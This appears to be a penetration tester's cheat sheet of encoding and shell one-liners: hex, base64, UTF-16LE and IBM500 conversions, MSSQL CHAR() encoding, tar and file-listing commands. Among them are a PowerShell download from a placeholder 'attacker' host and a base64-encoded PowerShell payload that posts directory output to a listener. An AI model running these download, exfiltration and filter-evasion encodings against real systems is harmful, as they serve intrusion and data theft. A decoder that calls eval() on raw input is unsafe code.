# python - str to hex
print(*[hex(ord(i))[2:] for i in input('str:')], sep='')

# bash - str to hex
# result : 616263
echo -n "abc" | xxd -p

# python - str to base64
base64.b64encode('string'.encode()).decode()

# python - hex to str
# input: 0x70696e67202d6e203230203132372e302e302e31
# output: ping -n 20 127.0.0.1
print(f"output: {bytearray.fromhex(input('input: ')[2:]).decode()}")

# bash - hex to str
# result : abc
echo -n "616263" | xxd -p -r

# python - str to ascii
print(*[f'CHAR({ord(i)})' for i in input('str:')], sep='%2B')

# python - mssql - ascii to str
# input: CHAR(69)+CHAR(114)+CHAR(114)+CHAR(111)+CHAR(114)+CHAR(76)+CHAR(111)+CHAR(103)+CHAR(70)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(78)+CHAR(97)+CHAR(109)+CHAR(101)
# output: ErrorLogFileName
print(eval(input("input:").replace('CHAR','chr')))

# win7 curl
powershell "$client=New-Object System.Net.WebClient;$c=$client.DownloadString('http://attacker/xxx.txt');write-host -NoNewline $c"

# powershell base64
echo -n '$r=cmd /c "dir /b";cmd /c curl 127.0.0.1:8877 --data "$r"' | iconv -f UTF-8 -t UTF-16LE | base64

# Calculate folder size
Get-ChildItem -Path "C:\htdocs" -Recurse | Measure-Object -Property Length -Sum | ForEach-Object { $_.Sum / 1MB }

# tar
tar -cvzf htdocs.tar.gz "C:\htdocs"
tar -zxvf htdocs.tar -C "D:\htdocs"

# encode base64 (utf-16)
echo -n "Test" | iconv -f UTF-8 -t UTF-16LE | base64

# string to ibm500 encode
echo -n "`read a;echo -n $a`" | iconv -f UTF-8 -t IBM500 | xxd -p | sed 's/../%&/g'

# Display all file extensions in the directory
find ./ -maxdepth 1 -type f | sed -n 's/.*\.//p' | sort -u
powershell "Get-ChildItem -File -Path './' | ForEach-Object { $_.Extension.TrimStart('.') } | Sort-Object -Unique"

# Display all file extensions in the directory (including files in all subdirectories)
find ./ -type f | sed -n 's/.*\.//p' | sort -u
powershell "Get-ChildItem -File -Recurse -Path './' | ForEach-Object { $_.Extension.TrimStart('.') } | Sort-Object -Unique"
